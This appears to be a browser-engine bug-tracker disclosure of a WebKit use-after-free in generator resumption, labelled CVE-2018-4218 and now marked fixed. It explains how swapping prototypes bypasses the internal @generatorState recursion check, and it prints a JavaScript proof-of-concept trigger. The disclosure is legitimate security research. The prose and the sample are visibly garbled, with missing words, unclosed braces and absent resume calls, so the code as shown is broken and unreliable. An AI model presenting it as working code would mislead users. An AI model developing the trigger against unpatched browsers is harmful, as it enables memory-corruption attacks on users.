New issue
Advanced search Search tips
Starred by 3 users

Issue metadata

Status: Fixed
Closed: Jun 2018

Sign in to add a comment

Issue 1553: WebKit: Use-after-free when resuming generator

Reported by, Mar 24 2018 Project Member

Issue description

In WebKit, resuming a generator is implemented in JavaScript. An internal object property, @generatorState is used to prevent recursion within generators. In GeneratorPrototype.js, the state is checked by calling:

    var state = this.@generatorState;

and set by calling:

    generator.@generatorState = @GeneratorStateExecuting;

Checking that the @generator property is set is also used in place of type checking the generator.

Therefore, if is called on an object with a prototype that is a Generator, it will pass the type check, and the internal properties of the Generator prototype will be used to resume the generator. However, when @generatorState, it will be set as an own property on the object, not the prototype. This allows the creation of non-Generator objects with the @generatorState set to completed.

It is then possible to bypass the recursion check by setting the prototype of one of these objects to a Generator, as the check will then get the object's @generatorState own property, meanwhile the other internal properties will come from the prototype.

Generators are not intended to allow recursion, so a reference to the scope is not maintained, leading to a use-after free.

A minimal sample of the script causing this problem is below, and a full PoC is attached.

var iterator;

var a = [];

function* foo(index) {

  while (1) {
    var q = a.pop();
    	q.__proto__ = iterator;;
    yield index++;

function* foo2(){

var temp = foo2(0);

for(var i = 0; i < 10; i++){ // make a few objects with @generatorState set
	var q = {};
	q.__proto__ = temp;;
	q.__proto__ = {};


iterator = foo(0);

var q = {};
q.__proto__ = iterator;

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
1.2 KB View Download

Comment 2 by, May 30 2018

Project Member
Labels: CVE-2018-4218

Comment 3 by, Jun 7 2018

Project Member
Labels: -Restrict-View-Commit
Status: Fixed (was: New)

Sign in to add a comment